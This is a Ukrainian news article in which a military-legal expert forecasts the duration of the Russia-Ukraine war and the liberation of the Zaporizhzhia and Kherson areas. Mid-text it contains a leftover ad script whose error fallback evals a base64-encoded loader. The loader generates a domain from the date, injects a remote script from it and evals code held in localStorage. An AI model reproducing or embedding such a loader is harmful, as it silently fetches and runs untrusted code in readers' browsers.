Зупинити просування ворога та звільнити території Запоріжжя і Херсонщини: скільки триватиме війна — прогноз експерта

Військовий експерт спрогнозував терміни тривалості війни в Україні.

Свою думку висловив політичний консультант, керівник Центру військово-правових досліджень, адвокат Олександр Мусієнко в эфірі телеканалу TV5, інформує Акцент.

«Чекати і вірити потрібно звичайно в перемогу, бо це найкраща мотивація для нас. Але треба розуміти, що цей шлях до перемоги насправді не є таким легким. Нам всім цього хочеться і взагалі, нормальний стан для всіх — це те, щоб припинилась війна, було мирне життя і всі опікувалися буденними справами. (…) Але ми бачимо, що з незалежних від нас підстав, фактично, розпочавши проти нас велику і жахливу агресію росія змінила цей стан і зараз багато хто страждає від війни і змушений змінити свої життєві умови. Треба розуміти, що це ще буде тривати певний час», — пояснює експерт.

На думку Олександра Мусієнко, війна не розтягнеться на роки, але і не закінчиться швидко, тому що зараз треба зупинити просування російських окупантів на сході і деокупувати території на Запорізькому та Херсонському напрямках.

«Сказати, що це може розтягнутися на роки — я не думаю, в мене немає настільки песимістичного прогнозу. Але сказати, що ця війна може закінчитися за дні чи за тижні — теж не доводиться, тому що треба розуміти, що зараз нам потрібно зупинити просування противника на сході, а потім перед усією державою стоїть надзвичано потужне завдання — звільнити окуповані території, зокрема на півдні — Херсонський і Запорізький напрямки. (…)«, — каже експерт.

Як вважає військовий експерт, те, що відбувається на сході, може тривати до кількох тижнів і після цього може наступити пауза, а війна може тривати максимум до кінця року. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Зараз, те що відбувається на сході, може протривати до кількох тижнів, потім, вочевидь, може настати пауза, яка, скажімо так, буде характизуватися меншою інтенсивністю бойових дій, тому що потрібен буде час для укомплектування тим же російським військам, бо вони несуть втрати. Потім війна може тривати, я думаю, максимум до кінця року. Я не думаю, що це може розвиватися довше. Можливо я і помиляюся — і це може відбутися і швидше, але точно немає прогнозів, що це може закінчитися за кілька днів чи тижнів», — зазначив Олександр Мусієнко.

Як раніше повідомляв Акцент, експерт дав оцінку ситуації на Запорізькому напрямку: він розповів про те, як зараз поводить себе російська армія і назвав липень «найгарячішою порою».

Експерт назвав липень «найгарячішою порою» і оцінив стан на Запорізькому напрямку

Також, як інформував Акцент, на тимчасово окупованих територіях посилюється народний опір: на загарбників тиснуть морально, розклеюючи листівки та фізично, позбавляючись колаборантів та окупантів. Експерт назвав головні успіхи сил спротиву на Запорізькому напрямку. (adsbygoogle = window.adsbygoogle || []).push({});

Эксперт назвал 4 главных успеха украинских партизан на Запорожском направлении (ВИДЕО) Подписывайтесь на Акцент в ПІДТРИМКА САЙТУ АКЦЕНТ Источник: https://akzent.zp.ua/zupiniti-prosuvannya-voroga-ta-zvilniti-teritoriyi-zaporizhzhya-i-hersonshhini-skilki-trivatime-vijna-prognoz-eksperta/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top